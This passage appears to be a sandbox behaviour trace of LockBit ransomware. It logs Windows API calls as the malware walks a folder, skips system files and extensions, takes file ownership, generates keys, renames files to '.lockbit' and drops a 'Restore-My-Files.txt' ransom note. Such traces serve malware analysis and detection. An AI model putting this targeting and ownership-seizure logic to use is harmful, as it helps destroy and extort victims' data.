lpString2=".png") returned 1 [0084.778] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.779] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.779] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.779] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.779] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.779] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.779] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.780] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.780] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.780] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.780] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.780] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.780] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_image-frame-border.png") returned 1 [0084.780] lstrcmpiW (lpString1="ntldr", lpString2="Pets_image-frame-border.png") returned -1 [0084.780] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_image-frame-border.png") returned -1 [0084.780] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_image-frame-border.png") returned -1 [0084.780] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_image-frame-border.png") returned -1 [0084.780] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_image-frame-border.png") returned 1 [0084.780] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_image-frame-border.png") returned -1 [0084.780] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.780] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png") returned=".png" [0084.780] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.781] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.781] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.782] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.782] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png.lockbit") returned 85 [0084.782] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.782] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.783] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.783] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.783] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.783] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.783] RtlFreeAnsiString (AnsiString="\\") [0084.783] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.783] malloc (_Size=0x200) returned 0x77d800 [0084.783] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.783] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.784] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.784] CloseHandle (hObject=0x3b4) returned 1 [0084.784] free (_Block=0x77d800) [0084.784] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.785] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.785] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.785] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=7946) returned 1 [0084.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.786] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.797] malloc (_Size=0xc0) returned 0x1ff1e60 [0084.797] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0084.797] free (_Block=0x1ff1e60) [0084.797] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.797] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.797] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.797] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1146, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_image-frame-ImageMask.png", cAlternateFileName="")) returned 1 [0084.797] lstrcmpiW (lpString1=".", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.797] lstrcmpiW (lpString1="..", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.797] PathFindExtensionW (pszPath="Pets_image-frame-ImageMask.png") returned=".png" [0084.797] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.798] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.798] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.798] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.798] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.799] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.799] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.800] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.800] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_image-frame-ImageMask.png") returned 1 [0084.800] lstrcmpiW (lpString1="ntldr", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.800] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.800] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.800] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.800] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_image-frame-ImageMask.png") returned 1 [0084.800] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_image-frame-ImageMask.png") returned -1 [0084.800] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.800] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png") returned=".png" [0084.800] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.800] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.800] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.800] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.801] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.801] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.801] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.801] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.801] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.802] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.802] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.802] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.802] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png.lockbit") returned 88 [0084.802] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.803] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.804] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.804] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.804] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.804] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.804] RtlFreeAnsiString (AnsiString="\\") [0084.804] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.804] malloc (_Size=0x200) returned 0x77d800 [0084.804] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.804] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.804] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.805] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.808] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.808] CloseHandle (hObject=0x3b4) returned 1 [0084.809] free (_Block=0x77d800) [0084.809] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.809] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.809] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.809] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4422) returned 1 [0084.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.810] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.820] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.820] malloc (_Size=0xc6) returned 0x1ff1e60 [0084.820] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc6, FileInformationClass=0xa) returned 0xc0000008 [0084.820] free (_Block=0x1ff1e60) [0084.821] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.821] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.821] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.821] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1ed0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_notes-txt-background.png", cAlternateFileName="")) returned 1 [0084.821] lstrcmpiW (lpString1=".", lpString2="Pets_notes-txt-background.png") returned -1 [0084.821] lstrcmpiW (lpString1="..", lpString2="Pets_notes-txt-background.png") returned -1 [0084.821] PathFindExtensionW (pszPath="Pets_notes-txt-background.png") returned=".png" [0084.821] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.821] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.821] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.822] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.822] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 